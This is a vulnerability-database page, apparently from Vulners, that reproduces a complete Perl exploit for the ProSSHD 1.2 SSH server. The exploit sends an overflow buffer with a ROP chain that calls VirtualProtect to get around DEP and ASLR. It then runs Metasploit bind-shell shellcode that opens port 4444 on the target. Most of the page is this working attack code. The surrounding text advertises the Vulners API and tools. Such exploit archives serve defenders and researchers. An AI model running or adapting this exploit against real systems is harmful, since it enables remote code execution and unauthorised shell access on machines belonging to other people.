Vulners
Lucene search
ProSSHD 1.2 remote post-auth exploit (w/ASLR and DEP bypass)
============================================================
ProSSHD 1.2 remote post-auth exploit (w/ASLR and DEP bypass)
============================================================
# Exploit Title: ProSSHD 1.2 remote post-auth exploit (w/ASLR and DEP bypass)
# Date: 03.05.2010
# Author: Alexey Sintsov
# Software Link: http://www.exploit-db.com/application/11618
# Version: 1.2
# Tested on: Windows XP SP3 / Windows 7
# CVE :
# Code :
################################################################################
# Original exploit by S2 Crew [Hungary]
# * * *
# ROP for DEP and ASLR bypass by Alexey Sintsov from DSecRG [www.dsecrg.com]
# * * *
# Tested on: ProSSHD v1.2 on Windows XP and Windows 7 with DEP for all
#
# Special for XAKEP magazine [www.xakep.ru]
#
#
# CVE: -
#!/usr/bin/perl
use Net::SSH2;
$username = '';
$password = '';
$host = '192.168.126.129'; #Remote host
#$host = '192.168.13.6';
$port = 22;
# windows/shell_bind_tcp - 368 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# LPORT=4444, RHOST=, EXITFUNC=process, InitialAutoRunScript=,
# AutoRunScript=
$shell =
"\xba\xda\x29\x13\xda\xd9\xe9\xd9\x74\x24\xf4\x58\x31\xc9" .
"\xb1\x56\x31\x50\x13\x83\xc0\x04\x03\x50\xd5\xcb\xe6\x26" .
"\x01\x82\x09\xd7\xd1\xf5\x80\x32\xe0\x27\xf6\x37\x50\xf8" .
"\x7c\x15\x58\x73\xd0\x8e\xeb\xf1\xfd\xa1\x5c\xbf\xdb\x8c" .
"\x5d\x71\xe4\x43\x9d\x13\x98\x99\xf1\xf3\xa1\x51\x04\xf5" .
"\xe6\x8c\xe6\xa7\xbf\xdb\x54\x58\xcb\x9e\x64\x59\x1b\x95" .
"\xd4\x21\x1e\x6a\xa0\x9b\x21\xbb\x18\x97\x6a\x23\x13\xff" .
"\x4a\x52\xf0\xe3\xb7\x1d\x7d\xd7\x4c\x9c\x57\x29\xac\xae" .
"\x97\xe6\x93\x1e\x1a\xf6\xd4\x99\xc4\x8d\x2e\xda\x79\x96" .
"\xf4\xa0\xa5\x13\xe9\x03\x2e\x83\xc9\xb2\xe3\x52\x99\xb9" .
"\x48\x10\xc5\xdd\x4f\xf5\x7d\xd9\xc4\xf8\x51\x6b\x9e\xde" .
"\x75\x37\x45\x7e\x2f\x9d\x28\x7f\x2f\x79\x95\x25\x3b\x68" .
"\xc2\x5c\x66\xe5\x27\x53\x99\xf5\x2f\xe4\xea\xc7\xf0\x5e" .
"\x65\x64\x79\x79\x72\x8b\x50\x3d\xec\x72\x5a\x3e\x24\xb1" .
"\x0e\x6e\x5e\x10\x2e\xe5\x9e\x9d\xfb\xaa\xce\x31\x53\x0b" .
"\xbf\xf1\x03\xe3\xd5\xfd\x7c\x13\xd6\xd7\x0b\x13\x18\x03" .
"\x58\xf4\x59\xb3\x4f\x58\xd7\x55\x05\x70\xb1\xce\xb1\xb2" .
"\xe6\xc6\x26\xcc\xcc\x7a\xff\x5a\x58\x95\xc7\x65\x59\xb3" .
"\x64\xc9\xf1\x54\xfe\x01\xc6\x45\x01\x0c\x6e\x0f\x3a\xc7" .
"\xe4\x61\x89\x79\xf8\xab\x79\x19\x6b\x30\x79\x54\x90\xef" .
"\x2e\x31\x66\xe6\xba\xaf\xd1\x50\xd8\x2d\x87\x9b\x58\xea" .
"\x74\x25\x61\x7f\xc0\x01\x71\xb9\xc9\x0d\x25\x15\x9c\xdb" .
"\x93\xd3\x76\xaa\x4d\x8a\x25\x64\x19\x4b\x06\xb7\x5f\x54" .
"\x43\x41\xbf\xe5\x3a\x14\xc0\xca\xaa\x90\xb9\x36\x4b\x5e" .
"\x10\xf3\x7b\x15\x38\x52\x14\xf0\xa9\xe6\x79\x03\x04\x24" .
"\x84\x80\xac\xd5\x73\x98\xc5\xd0\x38\x1e\x36\xa9\x51\xcb" .
"\x38\x1e\x51\xde";
$fuzz = "\x41"x491 . # buffer before RET addr rewriting
############################### ROP
# All ROP instructions from non ASLR modules (coming with ProSHHD distrib): MSVCR71.DLL and MFC71.DLL
# For DEP bypass used VirtualProtect call from non ASLR DLL - 0x7C3528DD (MSVCR71.DLL)
# this make stack executable:
#### RET rewrite###
"\x9F\x07\x37\x7C". # MOV EAX, EDI / POP EDI / POP ESI / RETN ; EAX points on our stack data with some offset
"\x11\x11\x11\x11". # JUNK---------------^^^ ^^^
"\x22\x22\x22\x22". # JUNK-------------------------^^^
"\x27\x34\x34\x7C". # MOV ECX, EAX / MOV EAX, ESI / POP ESI / RETN 10
"\x33\x33\x33\x33". # JUNK------------------------------^^^
"\xC1\x4C\x34\x7C". # POP EAX / RETN
# ^^^
"\x33\x33\x33\x33". # ^^^
"\x33\x33\x33\x33". # ^^^
"\x33\x33\x33\x33". # ^^^
"\x33\x33\x33\x33". # ^^^
# ^^^
"\xC0\xFF\xFF\xFF". # ----^^^ Param for next instruction...
"\x05\x1e\x35\x7C". # NEG EAX / RETN ; EAX will be 0x40 (param for VirtualProtect)
"\xc8\x03\x35\x7C". # MOV DS:[ECX], EAX / RETN ; save 0x40 (3 param)
"\x40\xa0\x35\x7C". # MOV EAX, ECX / RETN ; restore pointer in EAX
"\xA1\x1D\x34\x7C". # DEC EAX / RETN ; Change position
"\xA1\x1D\x34\x7C". # DEC EAX / RETN
"\xA1\x1D\x34\x7C". # DEC EAX / RETN
"\xA1\x1D\x34\x7C". # DEC EAX / RETN
"\xA1\x1D\x34\x7C". # DEC EAX / RETN
"\xA1\x1D\x34\x7C". # DEC EAX / RETN
"\xA1\x1D\x34\x7C". # DEC EAX / RETN
"\xA1\x1D\x34\x7C". # DEC EAX / RETN
"\xA1\x1D\x34\x7C". # DEC EAX / RETN
"\xA1\x1D\x34\x7C". # DEC EAX / RETN
"\xA1\x1D\x34\x7C". # DEC EAX / RETN
"\xA1\x1D\x34\x7C". # DEC EAX / RETN ; EAX=ECX-0x0c
"\x08\x94\x16\x7C". # MOV DS:[EAX+0x4], EAX / RETN ;save addres for VirtualProtect (1 param)
"\xB9\x1F\x34\x7C". # INC EAX / RETN ; oh ... and move pointer back
"\xB9\x1F\x34\x7C". # INC EAX / RETN
"\xB9\x1F\x34\x7C". # INC EAX / RETN
"\xB9\x1F\x34\x7C". # INC EAX / RETN ; EAX=ECX=0x8
"\xB2\x01\x15\x7C". # MOV [EAX+0x4], 1 ; size for VirtualProtect (2 param)
"\xA1\x1D\x34\x7C". # DEC EAX / RETN ; Change position for output from VirtualProtect
"\xA1\x1D\x34\x7C". # DEC EAX / RETN
"\xA1\x1D\x34\x7C". # DEC EAX / RETN
"\xA1\x1D\x34\x7C". # DEC EAX / RETN
"\xA1\x1D\x34\x7C". # DEC EAX / RETN
"\xA1\x1D\x34\x7C". # DEC EAX / RETN
"\xA1\x1D\x34\x7C". # DEC EAX / RETN
"\xA1\x1D\x34\x7C". # DEC EAX / RETN
"\xA1\x1D\x34\x7C". # DEC EAX / RETN
"\xA1\x1D\x34\x7C". # DEC EAX / RETN
"\xA1\x1D\x34\x7C". # DEC EAX / RETN
"\xA1\x1D\x34\x7C". # DEC EAX / RETN
"\x27\x34\x34\x7C". # MOV ECX, EAX / MOV EAX, ESI / POP ESI / RETN 10
"\x33\x33\x33\x33". # JUNK------------------------------^^^
"\x40\xa0\x35\x7C". # MOV EAX, ECX / RETN ; restore pointer in EAX
#
"\x33\x33\x33\x33". #
"\x33\x33\x33\x33". #
"\x33\x33\x33\x33". #
"\x33\x33\x33\x33". #
"\xB9\x1F\x34\x7C". # INC EAX / RETN ; and again...
"\xB9\x1F\x34\x7C". # INC EAX / RETN
"\xB9\x1F\x34\x7C". # INC EAX / RETN
"\xB9\x1F\x34\x7C". # INC EAX / RETN
"\xE5\x6B\x36\x7C". # MOV DS:[EAX+0x14], ECX ; save output addr for VirtualProtect (4 param)
"\xBA\x1F\x34\x7C"x204 . # RETN fill.....
"\xDD\x28\x35\x7C". # CALL VirtualProtect / LEA ESP, [EBP-58] / POP EDI / ESI / EBX / RETN ;Call VirtualProtect
"AAAABBBBCCCCDDDD". # Here is place for params (VirtualProtect)
####################### retrun into stack after VirtualProtect
"\x1A\xF2\x35\x7C". # ADD ESP, 0xC / RETN ; take next ret
"XXXYYYZZZ123". # trash
"\x30\x5C\x34\x7C". # 0x7c345c2e: ANDPS XMM0, XMM3 -- (+0x2 to address and....) --> PUSH ESP / RETN ; EIP=ESP
"\x90"x14 . # NOPs here is the begining of shellcode
$shell; # shellcode 8)
$ssh2 = Net::SSH2->new();
$ssh2->connect($host, $port) || die "\nError: Connection Refused!\n";
$ssh2->auth_password($username, $password) || die "\nError: Username/Password Denied!\n";
#sleep(10);
$scpget = $ssh2->scp_get($fuzz);
$ssh2->disconnect();
# 0day.today [2018-04-08] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
03 May 2010 00:00Current
7.1High risk
Vulners AI Score7.1